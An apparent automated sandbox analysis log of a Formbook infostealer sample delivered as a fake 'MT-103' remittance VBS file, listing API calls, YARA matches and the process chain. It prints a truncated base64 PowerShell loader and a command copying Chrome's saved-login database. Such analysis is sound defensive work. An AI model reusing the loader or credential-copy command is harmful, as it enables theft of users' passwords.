      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F1FF126_2_034F1FF1
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034ED61626_2_034ED616
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03446E3026_2_03446E30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F2EF726_2_034F2EF7
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F1D5526_2_034F1D55
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F2D0726_2_034F2D07
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03420D2026_2_03420D20
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034F25DD26_2_034F25DD
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343D5E026_2_0343D5E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0345258126_2_03452581
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034ED46626_2_034ED466
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0343841F26_2_0343841F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A2E61F26_2_02A2E61F
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A19E6026_2_02A19E60
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A19E5B26_2_02A19E5B
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A12FB026_2_02A12FB0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A12D8826_2_02A12D88
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A12D9026_2_02A12D90
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
      Source: Remittance Information (MT-103).vbsInitial sample: Strings found which are bigger than 50
      Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0342B150 appears 35 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1EC5B150 appears 35 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC996E0 NtFreeVirtualMemory,LdrInitializeThunk,23_2_1EC996E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99A50 NtCreateFile,LdrInitializeThunk,23_2_1EC99A50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99660 NtAllocateVirtualMemory,LdrInitializeThunk,23_2_1EC99660
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99A00 NtProtectVirtualMemory,LdrInitializeThunk,23_2_1EC99A00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99A20 NtResumeThread,LdrInitializeThunk,23_2_1EC99A20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99780 NtMapViewOfSection,LdrInitializeThunk,23_2_1EC99780
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC997A0 NtUnmapViewOfSection,LdrInitializeThunk,23_2_1EC997A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99710 NtQueryInformationToken,LdrInitializeThunk,23_2_1EC99710
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC998F0 NtReadVirtualMemory,LdrInitializeThunk,23_2_1EC998F0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99840 NtDelayExecution,LdrInitializeThunk,23_2_1EC99840
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99860 NtQuerySystemInformation,LdrInitializeThunk,23_2_1EC99860
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC999A0 NtCreateSection,LdrInitializeThunk,23_2_1EC999A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99540 NtReadFile,LdrInitializeThunk,23_2_1EC99540
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99910 NtAdjustPrivilegesToken,LdrInitializeThunk,23_2_1EC99910
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC996D0 NtCreateKey,23_2_1EC996D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99A80 NtOpenDirectoryObject,23_2_1EC99A80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99650 NtQueryValueKey,23_2_1EC99650
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99670 NtQueryInformationProcess,23_2_1EC99670
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99610 NtEnumerateValueKey,23_2_1EC99610
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99A10 NtQuerySection,23_2_1EC99A10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99FE0 NtCreateMutant,23_2_1EC99FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC9A3B0 NtGetContextThread,23_2_1EC9A3B0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99760 NtOpenProcess,23_2_1EC99760
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99770 NtSetInformationFile,23_2_1EC99770
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC9A770 NtOpenThread,23_2_1EC9A770
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99B00 NtSetValueKey,23_2_1EC99B00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC9A710 NtOpenProcessToken,23_2_1EC9A710
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99730 NtQueryVirtualMemory,23_2_1EC99730
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC998A0 NtWriteVirtualMemory,23_2_1EC998A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC9B040 NtSuspendThread,23_2_1EC9B040
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99820 NtEnumerateKey,23_2_1EC99820
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC999D0 NtCreateProcessEx,23_2_1EC999D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC995D0 NtClose,23_2_1EC995D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC995F0 NtQueryInformationFile,23_2_1EC995F0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99950 NtQueueApcThread,23_2_1EC99950
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99560 NtWriteFile,23_2_1EC99560
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC99520 NtWaitForSingleObject,23_2_1EC99520
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 23_2_1EC9AD30 NtSetContextThread,23_2_1EC9AD30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469B00 NtSetValueKey,LdrInitializeThunk,26_2_03469B00
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469A50 NtCreateFile,LdrInitializeThunk,26_2_03469A50
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469910 NtAdjustPrivilegesToken,LdrInitializeThunk,26_2_03469910
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034699A0 NtCreateSection,LdrInitializeThunk,26_2_034699A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469840 NtDelayExecution,LdrInitializeThunk,26_2_03469840
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469860 NtQuerySystemInformation,LdrInitializeThunk,26_2_03469860
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469770 NtSetInformationFile,LdrInitializeThunk,26_2_03469770
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469710 NtQueryInformationToken,LdrInitializeThunk,26_2_03469710
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469FE0 NtCreateMutant,LdrInitializeThunk,26_2_03469FE0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469780 NtMapViewOfSection,LdrInitializeThunk,26_2_03469780
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469650 NtQueryValueKey,LdrInitializeThunk,26_2_03469650
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469660 NtAllocateVirtualMemory,LdrInitializeThunk,26_2_03469660
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469610 NtEnumerateValueKey,LdrInitializeThunk,26_2_03469610
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034696D0 NtCreateKey,LdrInitializeThunk,26_2_034696D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034696E0 NtFreeVirtualMemory,LdrInitializeThunk,26_2_034696E0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469540 NtReadFile,LdrInitializeThunk,26_2_03469540
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469560 NtWriteFile,LdrInitializeThunk,26_2_03469560
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034695D0 NtClose,LdrInitializeThunk,26_2_034695D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0346A3B0 NtGetContextThread,26_2_0346A3B0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469A00 NtProtectVirtualMemory,26_2_03469A00
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469A10 NtQuerySection,26_2_03469A10
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469A20 NtResumeThread,26_2_03469A20
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469A80 NtOpenDirectoryObject,26_2_03469A80
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469950 NtQueueApcThread,26_2_03469950
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034699D0 NtCreateProcessEx,26_2_034699D0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0346B040 NtSuspendThread,26_2_0346B040
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469820 NtEnumerateKey,26_2_03469820
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034698F0 NtReadVirtualMemory,26_2_034698F0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034698A0 NtWriteVirtualMemory,26_2_034698A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469760 NtOpenProcess,26_2_03469760
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0346A770 NtOpenThread,26_2_0346A770
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0346A710 NtOpenProcessToken,26_2_0346A710
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469730 NtQueryVirtualMemory,26_2_03469730
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034697A0 NtUnmapViewOfSection,26_2_034697A0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469670 NtQueryInformationProcess,26_2_03469670
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_03469520 NtWaitForSingleObject,26_2_03469520
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_0346AD30 NtSetContextThread,26_2_0346AD30
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_034695F0 NtQueryInformationFile,26_2_034695F0
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A2A360 NtCreateFile,26_2_02A2A360
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A2A490 NtClose,26_2_02A2A490
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A2A410 NtReadFile,26_2_02A2A410
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A2A540 NtAllocateVirtualMemory,26_2_02A2A540
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A2A35D NtCreateFile,26_2_02A2A35D
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 26_2_02A2A48A NtClose,26_2_02A2A48A
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220124Jump to behavior
      Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@18/16@5/2
      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Remittance Information (MT-103).vbs"
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Remittance Information (MT-103).vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAV
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5wwhq3bl\5wwhq3bl.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4377.tmp" "c:\Users\user\AppData\Local\Temp\5wwhq3bl\CSCEED551C9B69E4D3BACB27851B833AAE.TMP"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxA